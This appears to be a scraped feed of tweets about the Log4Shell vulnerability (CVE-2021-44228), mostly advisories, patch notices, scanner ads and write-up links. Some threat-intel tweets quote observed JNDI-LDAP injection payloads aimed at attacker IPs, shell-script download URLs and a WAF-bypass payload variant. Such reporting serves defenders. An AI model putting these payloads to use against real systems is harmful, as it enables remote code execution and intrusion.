2022-02-03 13:00:13K19026212: Apache Log4j2 Remote Code Execution vulnerability CVE-2021-44228 https://t.co/2KJHi1axRU http://www.ccn-cert.cni.es/component/vulnerabilidades/view/33076.htmlSombreroBlanc0
2022-02-03 08:23:13#Learnwithrootecstak Top Cve's Used In Month Of Jan (1-31) CVE-2021-44228: Apache &lt;2.15.0 Log4j Rce… https://t.co/9ZyKDmkvtz https://twitter.com/i/web/status/1489146773709144066rootecstak
2022-02-03 00:00:23Example CVE-2021-44228 payload (decoded): http://188.132.179.254/ldr.sh (🇹🇷) ⬇️ http://188.132.179.254/dlr.sh ⬇️ ht… https://t.co/seHeeJueEN https://twitter.com/i/web/status/1489023667241558019bad_packets
2022-02-02 16:20:48Here is a link to log4j-detector, a "Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021… https://t.co/XKPq3wuTEF https://twitter.com/i/web/status/1488908836475965450mjkalasky2
2022-02-02 15:01:23Even as the response and cleanup from Log4Shell (CVE-2021-44228) continues, we can learn from what happened and eme… https://t.co/iabkAI0VAF https://twitter.com/i/web/status/1488887451108220933F5Labs
2022-02-02 13:20:10転職121営業日目 Log4jについて - CVE-2021-44228 - 攻撃手順(Attacker目線) 1 攻撃対象に文字列を送る, ${jndi:&lt;protocol&gt;://&lt;url&gt;} 2 Log4jの機能JNDI L… https://t.co/0XVWCEE1Zh https://twitter.com/i/web/status/1488864730437537802studyinfra
2022-02-02 09:51:201. CVE-2021-44228 2. CVE-2022-0185 3. CVE-2021-40444 4. CVE-2021-35232 5. CVE-2021-20038 6. CVE-2021-45467 7. CVE-2… https://t.co/dybD6obREp https://twitter.com/i/web/status/1488810280167501831cyberthint
2022-02-02 09:30:20で、脆弱性は公開される時に識別子としてCVEが、脅威度の目安としてCVSSスコアが採番されるのだけれど、以前Minecraftで脆弱性が報告された時はCVEとしてCVE-2021-44228(Apache Log4jのもの)が、CVSSスコアは最高値の10.0がついていました。glacier_games
2022-02-01 22:00:36“Apache Log4j CVE-2021-44228 (Log4Shell) の影響有無リスト” https://t.co/cWEHpxZqGm https://htn.to/3mYKijMvWfmodokey
2022-02-01 20:54:40🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3… https://t.co/8qjNS3YSEg https://twitter.com/i/web/status/1488613943287422984threatintelctr
2022-02-01 07:10:30A critical vulnerability was discovered in the Apache log4j project (CVE-2021-44228). Even if products and services… https://t.co/EfYExdjkvb https://twitter.com/i/web/status/1488406888085655552DevolutionsInc
2022-01-31 15:11:40L’attività riguardante il monitoraggio degli attacchi che hanno sfruttato il CVE-2021-44228 ha registrato un picco… https://t.co/gNOgtXX0Xx https://twitter.com/i/web/status/1488167383864950790guelfoweb
2022-01-31 13:00:33Apache Log4jの脆弱性(CVE-2021-44228)の影響について 〔01/31 ファナック〕 https://t.co/HBg0XV5eyL https://t.co/SPFJdkIb54 http://www.jpubb.com/press/3005143/JPubbEleApNews
2022-01-31 03:20:11Solar - log4j: CVE-2021-44228 Esta vulnerabilidad afecta al paquete de registro de Java log4j, permite la ejecució… https://t.co/63qjEHDrtv https://twitter.com/i/web/status/1487988881760915457SteckMera
2022-01-29 18:20:21mmmm... el profesor nos dirigió sin indicarlo obviamente, al infame CVE-2021-44228. Debian V9 con apache release 2.… https://t.co/1xqrBAKrOl https://twitter.com/i/web/status/14874883941670051841978RRS
2022-01-29 15:11:05CVE-2021-44228 https://t.co/NLm0RVxfjG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-29 15:10:12Intrusions for CVE-2021-44228 also known as log4shell continue. I mean against institutions that have moderate reso… https://t.co/A4X7rfDqdZ https://twitter.com/i/web/status/1487442354747449344ImposeCost
2022-01-29 14:10:38Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-4034: 516.6K (audience size) CVE-2021-44228: 284.6K CVE-2022-… https://t.co/x7KYxNo2GS https://twitter.com/i/web/status/1487425306193506308CVEtrends
2022-01-29 12:41:55VMware Response to Apache Log4j Remote Code Execution Vulnerabilities (CVE-2021-44228, CVE-2021-45046)… https://t.co/wqfux4SpTL https://twitter.com/i/web/status/1487404223478345731samilaiho
2022-01-29 07:50:40@IBKR Warning: An infected file in the Trader Station software Type: Exploit: Java /CVE-2021-44228 /Users/xxxxxx/Ap… https://t.co/k5SbBIAkX1 https://twitter.com/i/web/status/1487330622062436355ngc_3370
2022-01-29 03:50:51pq esquecemos do Log4J JNDI - A Maior VULNERABILIDADE DO JAVA e MINECRAFT (CVE-2021-44228) - Log4j https://t.co/mVjEdfjAq9 via @YouTube https://youtu.be/oxFaS2oU854Advmarinho2
2022-01-28 23:00:04CVE-2021-44228 Has been modified. NVD Published Date: 12/10/22. NVD Last Modified 1/24/2022! 🕵️‍♂️👨‍💻👨‍💻Jazziest175
2022-01-28 21:51:27Summary of CyberRes impact from Log4J or #Log4shell/LogJam (CVE-2021-44228) | Summary of Cyberres impacted by Denia… https://t.co/mSNoQFGfXu https://twitter.com/i/web/status/1487178739452678158AArabojr
2022-01-28 20:50:56.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/qYKP6eNeiD https://twitter.com/i/web/status/1487164654031970306Woronka
2022-01-28 20:00:25An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/B93GEkyjvJ https://twitter.com/i/web/status/1487151204262100992ProductCERT
2022-01-28 16:30:12CovertSwarm demonstrating a full remote 'root' attack chain - enabled by Log4Shell (CVE-2021-44228) + PwnKit (CVE-2… https://t.co/wXwVoM3qhh https://twitter.com/i/web/status/1487099081554022405CovertSwarm
2022-01-28 16:00:42Unifi Network Application RCE using #log4j/#log4shell (CVE-2021-44228) utilized in the wild. Previously reported… https://t.co/uJcuQByxar https://twitter.com/i/web/status/1487092956188356615osipov_ar
2022-01-28 15:55:10CVE-2021-4035 log4j CVE-2021-44228 + polkit CVE-2021-4034 Vulnerable instance for the log4j apache exploit and pri… https://t.co/fwlfAHHWPy https://twitter.com/i/web/status/1487088406597414921VulmonFeeds
2022-01-28 14:31:43CVE-2021-44228 Log4Shell Overview https://t.co/FjDKJLGIT3 http://dlvr.it/SHz7gFExploit_This
2022-01-28 12:32:50Dug into what we @AWNetworks actually saw related to log4shell / CVE-2021-44228. Mostly noise and a tonne of tri… https://t.co/PvN9bu2WMs https://twitter.com/i/web/status/1487038319523418112ianmcshane
2022-01-27 14:01:30CVE-2021-44228でも自由に権限昇格は出来なかった気がするんだけど。kmizumar
2022-01-27 12:56:27VMware Warns of Log4j Attacks Targeting Horizon Servers | SecurityW... (Securityweek) Tracked as CVE-2021-44228, t… https://t.co/brTDgGV5AH https://twitter.com/i/web/status/1486680932388007939InfoSec_b
2022-01-27 00:13:07Continuously secure your applications and scan for #log4j vulnerability CVE-2021-44228 with HCL AppScan's Dynamic A… https://t.co/DrrIrogCHE https://twitter.com/i/web/status/1486490470293258242JavieMorales
2022-01-26 20:30:46VMware Response to Apache Log4j Remote Code Execution Vulnerabilities (CVE-2021-44228, CVE-2021-45046) VMSA-202… https://t.co/2Z7PwltgYA https://twitter.com/i/web/status/1486435268957716482msolde
2022-01-26 15:57:41Yet another example of why we can't have nice things ...imagine chaining this with CVE-2021-44228 https://t.co/WZDINHC7h4 https://twitter.com/_JohnHammond/status/1486113862881624065rjacksix
2022-01-26 15:32:18呟いてなかったような気がするw 脆弱性を使って、その脆弱性を修正するという荒業 サイバーリーズン、Log4j2(Log4Shell)脆弱性(CVE-2021-44228)をついた攻撃(エクスプロイト)防止のために、ワクチンを提供… https://t.co/bXNnrTxf1r https://twitter.com/i/web/status/1486360284168331264samturn
2022-01-26 10:02:16The latest update for #Logitio includes "How To Detect &amp; Mitigate Apache #Log4j CVE-2021-44228" and "Interview with… https://t.co/VQZxeofEol https://twitter.com/i/web/status/1486166801314721795opsmatters_uk
2022-01-25 19:20:05Threat actors exploit VMware Horizon via #Log4Shell (#CVE-2021-44228) 💥 Three #DFIR and #ThreatIntel cases:… https://t.co/5U1Iu9hYwf https://twitter.com/i/web/status/1486055722974646272Max_Mal_
2022-01-25 14:00:05Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2022-20655: 566.7K (audience size) CVE-2021-44228: 182.4K CVE-2022… https://t.co/xVHIkXHGMd https://twitter.com/i/web/status/1485975750931103744CVEtrends
2022-01-25 09:20:52CVE-2021-44228 Log4Shell Overview https://t.co/miKXEeqlnK https://ift.tt/3KChr5kcyberbuzznews
2022-01-25 09:00:09🔴APACHE🔴 Múltiples vulnerabilidades de severidad alta en productos APACHE: CVE-2022-23307,CVE-2021-44228 Más inf… https://t.co/E6yjjlGK2n https://twitter.com/i/web/status/1485899391324069892GrupoICA_Ciber
2022-01-25 06:50:04CVE-2021-44228 - Log4j - MINECRAFT VULNERABLE! (and SO MUCH MORE) https://t.co/UrsyYT31v5 via @YouTube 🥺 dang https://youtu.be/7qoPDq41xhQNakaRamatya
2022-01-25 04:30:33Analysis of Initial In The Wild Attacks Exploiting Log4Shell/Log4J/CVE-2021-44228 https://t.co/7BNWLT1F44 https://t.co/xWhHHNRjdc https://www.reddit.com/r/netsec/comments/rfeimn/analysis_of_initial_in_the_wild_attacks/?utm_source=dlvr.it&utm_medium=twittertechadversary
2022-01-25 03:00:14Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228) https://t.co/RPJq7eCgKw https://t.co/PcAMRtailO https://www.reddit.com/r/netsec/comments/rfcrwq/guide_how_to_detect_and_mitigate_the_log4shell/?utm_source=dlvr.it&utm_medium=twittertechadversary
2022-01-25 00:30:44scan for #log4j vulnerability CVE-2021-44228 with HCL AppScan's ➡️ : https://t.co/uEpjJQgkPF #AppSec #hclswlobp… https://t.co/qXgeSXRbQK https://hclsw.co/hoge7x https://twitter.com/i/web/status/1485764470509031424MiriamAsensi
2022-01-25 00:20:16Example CVE-2021-44228 payload: ${jndi:ldap://45.12.32.14:1389/a} (🇳🇱/🇷🇺/🇸🇨)* First seen: 2022-01-24T22:56:09Z So… https://t.co/VBgFM5Xjn3 https://twitter.com/i/web/status/1485767416021803015bad_packets
2022-01-24 16:20:05CVE-2021-44228 Log4Shell Overview https://t.co/L1yaF25Awv #whitepaper https://packetstormsecurity.com/files/165669cyberintel
2022-01-24 15:30:08More than a month after CVE-2021-44228 and some organizations are still looking for affected applications. Watch th… https://t.co/RuBCpiwKca https://twitter.com/i/web/status/1485635067112157186gagatiello
2022-01-24 15:20:05CVE-2021-44228 Log4Shell Overview: Whitepaper that gives exploitation and overview details on the Log4j vulnerabili… https://t.co/YIVsmYIc7u https://twitter.com/i/web/status/1485633145521119237cipherstorm
2022-01-24 15:20:04CVE-2021-44228 Log4Shell Overview: Whitepaper that gives exploitation and overview details on the Log4j vulnerabili… https://t.co/60lkdWq2Gk https://twitter.com/i/web/status/1485633145709817856shah_sheikh
2022-01-24 14:31:10Continuously secure your applications and scan for #log4j vulnerability CVE-2021-44228 with HCL AppScan's Dynamic A… https://t.co/whc2qm50OC https://twitter.com/i/web/status/1485610915831627778a190468
2022-01-24 12:50:12Continuously secure your applications and scan for #log4j vulnerability CVE-2021-44228 with HCL AppScan's Dynamic A… https://t.co/ZQpPwFjWgK https://twitter.com/i/web/status/1485595373838209024bale1966
2022-01-24 11:50:06Continuously secure your applications and scan for #log4j vulnerability CVE-2021-44228 with HCL AppScan's Dynamic A… https://t.co/WHBZu58DaX https://twitter.com/i/web/status/1485579929479753729FranciscoJCarb1
2022-01-24 04:40:12Thanks for sharing this alexverboon How To Detect the Log4Shell Vulnerability (CVE-2021-44228) with #MEMCM… https://t.co/3gn9tFimeP https://twitter.com/i/web/status/1485469935451222019ThomasKurth_ch
2022-01-23 13:00:14Zero-Day in Ghidra due to CVE-2021-44228 #bugbounty #bugbountytip #infosec Follow for more : @bugbounty0 https://t.co/3c0P9NfrVj https://github.com/NationalSecurityAgency/ghidra/releasesbugbounty0
2022-01-23 12:40:02I just published Lumberjack Turtle https://t.co/yH5QWf5X2b #tryhackme #CVE-2021-44228 https://link.medium.com/ELGJduWZ2mbanonexploiter
2022-01-23 12:31:17I just published Lumberjack Turtle https://t.co/yH5QWf5X2b #tryhackme #CVE-2021-44228 https://link.medium.com/ELGJduWZ2mbanonexploiter
2022-01-23 03:20:07Zero-Day in Ghidra due to CVE-2021-44228 #bugbounty #bugbountytip #infosec https://t.co/3c0P9NfrVj https://github.com/NationalSecurityAgency/ghidra/releasesbugbounty0
2022-01-22 18:30:13CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-22 18:20:08#VMware vRealize Operations Manager Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028) https://t.co/C9btLQZnfL #Nessus https://www.tenable.com/plugins/nessus/156932SecurityNewsbot
2022-01-22 15:10:44CVE-2021-44228 https://t.co/NLm0RVxfjG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-22 13:31:01"VMware has urged customers to apply the latest guidance as a way to resolve vulnerabilities CVE-2021-44228 and CVE-2021-4504."ohhara_shiojiri
2022-01-22 08:21:21VMware vRealize Operations Manager Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028) https://t.co/WzBZ2PQv8f https://ift.tt/3fRHOG0cc_cyberdefence
2022-01-22 08:21:05MobileIron Core Log4Shell Direct Check (CVE-2021-44228) https://t.co/UgnIGTVz9m https://ift.tt/3rFafg3cc_cyberdefence
2022-01-22 07:01:46MobileIron Core Log4Shell Direct Check (CVE-2021-44228) https://t.co/yQAXK8ZXt2 #Nessus https://www.tenable.com/plugins/nessus/156941SecurityNewsbot
2022-01-22 05:30:20Continuously secure your applications and scan for #log4j vulnerability CVE-2021-44228 with HCL AppScan's Dynamic A… https://t.co/BO85sJYVvK https://twitter.com/i/web/status/1484760236602937345HCLSoftware
2022-01-21 20:21:37VMware has urged customers to apply the latest guidance as a way to resolve vulnerabilities CVE-2021-44228 and CVE-… https://t.co/VSX9D1t4C7 https://twitter.com/i/web/status/1484621246092689409Nuusie_CyberSec
2022-01-21 18:53:34There’s been a ton of new information released recently about the CVE-2021-44228 Log4Shell vulnerability. We offer… https://t.co/nwhzW6i0Pi https://twitter.com/i/web/status/1484597164781232129cyberfort
2022-01-21 17:14:46A zero-day vulnerability was found in #Log4j, known as “CVE-2021-44228” or “ #Log4Shell ” which enables access infe… https://t.co/zLD3yJmMAd https://twitter.com/i/web/status/1484571600070533123whoisxmlapi
2022-01-21 15:42:32Check out our latest blog post for the #Log4Shell #vulnerability (CVE-2021-44228). Xenofon, #Twelvesec's… https://t.co/EGTbfhpoUk https://twitter.com/i/web/status/1484549094978867203twelvesec
2022-01-21 15:11:26CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-21 13:14:27Continúan las actualizaciones para mejorar la seguridad asociada al #CVE-2021-44228. Más información aquí 👉 https://t.co/O55WDZehP0 https://www.csirt-epn.edu.ec/como-tener/262-actualizaciones-de-seguridad-log4jCsirtEPN
2022-01-21 12:50:46Log4Shell - CVE-2021-44228, was disclosed concerning Apache Log4j 2, a popular open-source library. Learn about… https://t.co/Cfgj7hWxzB https://twitter.com/i/web/status/1484508335697448964Sennovate
2022-01-21 10:20:22The Log4Shell/ Log4j Vulnerability (CVE-2021-44228) Explained https://t.co/KkeIAqFtKR https://t.co/BNEB5dVNa4 https://bit.ly/3GQTMMfkoschulte
2022-01-21 07:22:25VMware vCenter Server Unauthenticated Log4Shell JNDI Injection RCE (CVE-2021-44228) GET /websso/SAML2/SLO/vsphere.… https://t.co/k0z9Et6S33 https://twitter.com/i/web/status/1484423859797622784wugeej
2022-01-21 05:20:07#ARBEITSSICHERHEIT ►Berlin/gc. Die Sicherheitslücke Log4shell (CVE-2021-44228) in der Java-Bibliothek log4j ist auc… https://t.co/zf9imbH5VH https://twitter.com/i/web/status/1484395073613803520GermanCircle
2022-01-21 04:00:46IT Risk: Red Hat.Multiple vulnerabilities including CVE-2021-44228 in Integration Camel Extensions for Quarkus 2.2,… https://t.co/uGVUgVOWrE https://twitter.com/i/web/status/1484372715536453639management_sun
2022-01-21 04:00:32IT Risk: Red Hat.Multiple vulnerabilities including CVE-2021-44228 in Integration Camel Extensions for Quarkus 2.2,… https://t.co/Z62Ua2s1Cn https://twitter.com/i/web/status/1484372717268713477management_sun
2022-01-21 03:50:41IT Risk: Red Hat.Integration Camel Extensions for Quarkus 2.2,Integration Camel-KにCVE-2021-44228を含む複数の脆弱性 -1/2 コードや… https://t.co/ebW0f2i1dq https://twitter.com/i/web/status/1484372597026422792management_sun
2022-01-21 03:50:25IT Risk: Red Hat.Integration Camel Extensions for Quarkus 2.2,Integration Camel-KにCVE-2021-44228を含む複数の脆弱性 -2/2 CVE-2021-44832 CVE-2021-44228management_sun
2022-01-20 23:20:26TIL that apparently now there are CVE NFTs (because of course there are 🤮) and log4j CVE-2021-44228 currently goes… https://t.co/F96JtzYqZZ https://twitter.com/i/web/status/1484304738355056641jschauma
2022-01-20 23:12:50This week is being all about #Log4j #Avaya Patching - including the #CVE-2021-44228 #Redhat #VoIP https://t.co/GbmpnYPadrwellington_paez
2022-01-20 21:51:38🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3… https://t.co/YCjkr6LDvz https://twitter.com/i/web/status/1484280377745330177threatintelctr
2022-01-20 20:42:22@buherator None of these are for CVE-2021-44228 or CVE-2021-45046. It just says "this patch also addresses vulnerab… https://t.co/ZgN8jEk0Tu https://twitter.com/i/web/status/1484262328761823241cybermindy
2022-01-20 18:40:15CVE-2021-44228 has just been minted: https://t.co/OKyH9aK7me 🥴 But you can also choose to spend your money in bette… https://t.co/EBfkzpUTyB https://cryptocves.com/token/17 https://twitter.com/i/web/status/1484232888644251652yazicivo
2022-01-20 18:11:07✅RP 5.6.3 released: Log4J vulnerabilities CVE-2021-44832, CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 address… https://t.co/EjgIx6iSYm https://twitter.com/i/web/status/1484225602043400194ReportPortal_io
2022-01-20 15:11:51CVE-2021-44228 https://t.co/NLm0RVxfjG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-20 14:50:17Google Cloud IDS signature updates help detect Apache Log4j vulnerabilities CVE-2021-44228, CVE-2021-45046, CVE-202… https://t.co/95Ze7mZyK2 https://twitter.com/i/web/status/1484175653247193094webAnalyste
2022-01-20 11:40:35webに関わる人々が慌てたApache Log4jの脆弱性(CVE-2021-44228)ですが、CVE-2021-45105とかCVE-2021-44832とか、色んな数字出てきてなんなん?と思った方はこのサイト見るといいですよ。 https://t.co/7YWypmI2Qp https://www.ipa.go.jp/security/vuln/CVE.htmlJunichirou_Ueno
2022-01-20 00:20:28… The Log4j vulnerability (CVE-2021-44228, CVE-2021-45046) is a critical vulnerability (CVSS 3.1 base [...] [2/2]AWSBlogs
2022-01-19 21:35:22If you applied rules for CVE-2021-44228, make sure they can't be easily bypassed by the techniques detailed by… https://t.co/hpcaOPmg8G https://twitter.com/i/web/status/1483912104163823619sloppy_bear
2022-01-19 19:12:04A new vulnerability called “CVE-2021-44228” or “#Log4Shell” detected in early Dec, alerted the #cybersecurity commu… https://t.co/gTaNiOZCAd https://twitter.com/i/web/status/1483876987127095297whoisxmlapi
2022-01-19 15:13:17CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-19 15:13:12A critical vulnerability was discovered in the Apache log4j project (CVE-2021-44228). Even if products and services… https://t.co/jAnyxgoBw2 https://twitter.com/i/web/status/1483816955786190848remotedeskman
2022-01-19 15:12:32CVE-2021-44228-PoC-log4j-bypass-words https://t.co/atwGW1Od1r https://t.co/ODwT8nNqSx https://ift.tt/3rubZIZ https://ift.tt/3GKOpODbuaqbot
2022-01-19 14:50:11This week's catchiest title award goes to @TenableSecurity: CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequent… https://t.co/yoMELr7kXG https://twitter.com/i/web/status/1483812640048746496cryptorobert
2022-01-19 14:37:37Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2022-21907: 1.5M (audience size) CVE-2021-44228: 570.7K CVE-2021-4… https://t.co/RkfG37IZxs https://twitter.com/i/web/status/1483801428292521985CVEtrends
2022-01-19 12:20:26[SAS Japan Blog] Apache Log4jのCVE-2021-44228脆弱性に関するアップデート https://t.co/KyAKagXQqQ https://blogs.sas.com/content/sasjapan/2022/01/19/cve-2021-44228-log4j/SASJapan
2022-01-19 08:01:44Apache Log4jのCVE-2021-44228脆弱性に関するアップデート https://t.co/ihULpecXag https://t.co/X7ipk3PyyT http://dlvr.it/SHNw9lDataQualityKing
2022-01-19 05:10:30IT Risk: Oracle.Multiple vulnerabilities in Construction and Engineering -3/3 CVE-2021-44790 CVE-2021-44228 CVE-202… https://t.co/9F476yzrJj https://twitter.com/i/web/status/1483665740264017921management_sun
2022-01-19 04:50:22🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3… https://t.co/i783d0UTcf https://twitter.com/i/web/status/1483661297375981572threatintelctr
2022-01-19 03:50:56@splunk @CISAgov Shout out to @M_haggis for including CVE-2021-44228 *ahem* on the latest detections for Linux Java… https://t.co/WZ1tseLqMK https://twitter.com/i/web/status/1483646757728706563drewchurch
2022-01-18 23:52:35Log4Shell (CVE-2021-44228) is bad, but that doesn’t mean everything is bad. Even F5 Labs’ resident pessimist thinks… https://t.co/bLPtA2mJTL https://twitter.com/i/web/status/1483585012192661504F5Labs
2022-01-18 22:03:35Attackers are actively targeting VMware Horizon servers vulnerable to Apache Log4j CVE-2021-44228 (Log4Shell) and r… https://t.co/n7Eey12qgF https://twitter.com/i/web/status/1483557814362640389rapid7
2022-01-18 21:40:41『「Log4Shell(CVE-2021-44228)」が発覚した際には、Log4jのメンテナが「GitHub上にわずか3人しかいない」ことが明らかに』/全世界を揺るがした「Log4j」のようなオープンソースソフトウェアを無償でメ… https://t.co/e5ALQckBZv https://twitter.com/i/web/status/1483553919699910662kind_Dark
2022-01-18 15:11:38CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-18 14:53:24log4j-finder: Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228,… https://t.co/Abe9kahmX0 https://twitter.com/i/web/status/1483449111269593098CyberWarship
2022-01-18 14:50:53log4j-finder: Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228,… https://t.co/bPl2eTVeDF https://twitter.com/i/web/status/1483450465203671045beingsheerazali
2022-01-18 14:11:35NHS detected cyber attack on their systems where threat actors were exploiting Log4j vulnerability CVE-2021-44228 i… https://t.co/oxIoi9Bmj7 https://twitter.com/i/web/status/1483439065466875912security_hq
2022-01-18 11:13:57https://t.co/T5almATHWa Of course Log4j vulnerability Log4shell (CVE-2021-44228) check is there via custom rule. Th… https://t.co/lN4TCv7zll http://Scanmycode.today https://twitter.com/i/web/status/1483394022920052737marcinguy
2022-01-18 11:00:50CVE-2021-44228 Log4Shell Detection https://t.co/vPZAHA8lMH lewat @LogRhythm https://logrhythm.com/blog/cve-2021-44228-log4shell-detection/AhmadRo22638208
2022-01-18 08:14:02"Hibernate projects are not affected by the vulnerabilities behind CVE-2021-45046 and CVE-2021-44228: none of the H… https://t.co/1pV57p4ozt https://twitter.com/i/web/status/1483348800680960006SamProgramiz
2022-01-18 05:50:58[GCP Blog] Google Cloud IDS のシグネチャの更新による Apache Log4j の脆弱性 CVE-2021-44228、CVE-2021-45046、CVE-2021-4104、CVE-2021-451… https://t.co/YTbwA4HVaO https://twitter.com/i/web/status/1483315309465505796saitoyasuyuki
2022-01-18 05:21:43Cloud Blog JA | Google Cloud IDS のシグネチャの更新による Apache Log4j の脆弱性 CVE-2021-44228、CVE-2021-45046、CVE-2021-4104、CVE-202… https://t.co/t5GTqZqP0b https://twitter.com/i/web/status/1483306270383906817MKURIB
2022-01-18 05:20:35Google Cloud IDS のシグネチャの更新による Apache Log4j の脆弱性 CVE-2021-44228、CVE-2021-45046、CVE-2021-4104、CVE-2021-45105、CVE-2021… https://t.co/VX8nUIg6gh https://twitter.com/i/web/status/1483307993034899460kaz_goto
2022-01-18 01:12:16The latest update for #HAProxy includes "What Is #LoadBalancing" and "December/2021 – CVE-2021-44228: #Log4Shell Re… https://t.co/MCLgdnyoAG https://twitter.com/i/web/status/1483243821668384777opsmatters_uk
2022-01-18 00:26:46SELinux/iptablesとApache Log4jの任意のコード実行の脆弱性(Log4Shell: CVE-2021-44228) https://t.co/b10L8N15oX https://security.cms.staging-test.sios.jp/security/apache-log4j-selinux-poc-20211219.htmlmatsuu_zatsu
2022-01-17 22:50:11.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/tt9obuxgHY https://twitter.com/i/web/status/1483208722218369029Woronka
2022-01-17 22:10:09An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/JHSPSwMTui https://twitter.com/i/web/status/1483198670136877062ProductCERT
2022-01-17 15:10:44CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-17 14:50:29Log4j: Es sind neue IBM Updates in Version 8.1.13.3 mit Apache Log4j v2.17.1 verfügbar (CVE-2021-44228)!… https://t.co/0fJ4siapFB https://twitter.com/i/web/status/1483087784030220290empalis
2022-01-17 10:20:06Apache Log4j2 2.14.1 RCE (CVE-2021-44228) Bypass WAF 1. ${jndi:ldap://127.0.0.1:1389/ badClassName} 2. ${${::-j}… https://t.co/UiG1GV0Gua https://twitter.com/i/web/status/1483020942603272192jeffyd364
2022-01-17 10:00:06Log4j RCE 0-day vulnerability (CVE-2021-44228) mitigation actions: I had an update from my very good friend and exc… https://t.co/5Dzab0cQ2x https://twitter.com/i/web/status/1483014618004213765LangageJava
2022-01-17 07:10:28Log4j RCE 0-day vulnerability (CVE-2021-44228) mitigation actions https://t.co/xkgZUcviDc https://www.javacodegeeks.com/2022/01/log4j-rce-0-day-vulnerability-cve-2021-44228-mitigation-actions.htmlfeedpushr
2022-01-17 06:40:31Log4j RCE 0-day vulnerability (CVE-2021-44228) mitigation actions – Java Code Geeks https://t.co/O4sCCmfo79 https://ift.tt/33kAMY2supermunaf
2022-01-17 05:20:32#Log4j RCE 0-day vulnerability (CVE-2021-44228) mitigation actions - #Java Code Geeks - 2022 https://t.co/0fcQRfmKZ5 https://buff.ly/3qHWSwxjavacodegeeks
2022-01-17 05:20:21SELinuxで防げるかの検証は興味深い。 SELinux/iptablesとApache Log4jの任意のコード実行の脆弱性(Log4Shell: CVE-2021-44228) https://t.co/KBsQXTZhVA https://security.cms.staging-test.sios.jp/security/apache-log4j-selinux-poc-20211219.htmlkabukawa
2022-01-16 20:10:15Buscar versiones hasta log4j-core-2.14.1.jar, afectadas por vulnerabilidad Log4Shell CVE-2021-44228 find / |grep lo… https://t.co/hOcU284eZa https://twitter.com/i/web/status/1482805501889060864hackyseguridad
2022-01-16 20:00:11Buscar versiones hasta log4j-core-2.14.1.jar, afectadas por vulnerabilidad Log4Shell CVE-2021-44228 find / |grep l… https://t.co/YKnePp8pCw https://twitter.com/i/web/status/1482803336663519236hackyseguridad
2022-01-16 19:40:11Buscar versiones hasta log4j-core-2.14.1.jar, afectadas por vulnerabilidad Log4Shell CVE-2021-44228 find / |grep lo… https://t.co/ohRez1FcPf https://twitter.com/i/web/status/1482798731695112199hackyseguridad
2022-01-16 18:40:10This can summarize the weekend so far… #CVE-2021-44228 #CVE-2021-45046 https://t.co/JTNB1lfHjF https://t.co/sjal4oltkX https://twitter.com/kostastsale/status/1482114686388621313Kostastsale
2022-01-16 18:30:06CVE-2021-44228 https://t.co/NLm0RVxfjG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-16 15:10:08CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-01-16 10:30:04CVE-2021-44228 Log4J Vulnerability Scanner Read more 👉 https://t.co/fWTj6P9OqC #RceVulnerabilityScanner… https://t.co/7UbGPy3oiK https://securityforeveryone.com/tools/apache-remote-code-injection-in-log4j-cve-2021-44228 https://twitter.com/i/web/status/1482661191898042368secforeveryone
2022-01-16 10:10:20I was awarded a $9,000 bounty on H1 Weakness: CVE-2021-44228tosun7331
2022-01-16 06:10:04Following the recent Log4j vulnerability CVE-2021-44228, the Juniper Threat Labs team continues to monitor attacks… https://t.co/o0PH2EEQSf https://twitter.com/i/web/status/1482593721334087682dnoguer
2022-01-15 20:00:08Example CVE-2021-44228 payload: {jndi:ldap://212.193.30.176:1389/o=tomcat} Path targeted: POST /api/login First… https://t.co/9fNqwUD0fe https://twitter.com/i/web/status/1482441522058432513bad_packets
2022-01-15 19:30:06I listed the toolkits that I use or find useful for the Loj4j(CVE-2021-44228) vulnerability. #log4j #Vulnerability https://t.co/95hvAj3XAA https://github.com/sdogancesur/log4j_github_repositoryTheFalconBrave
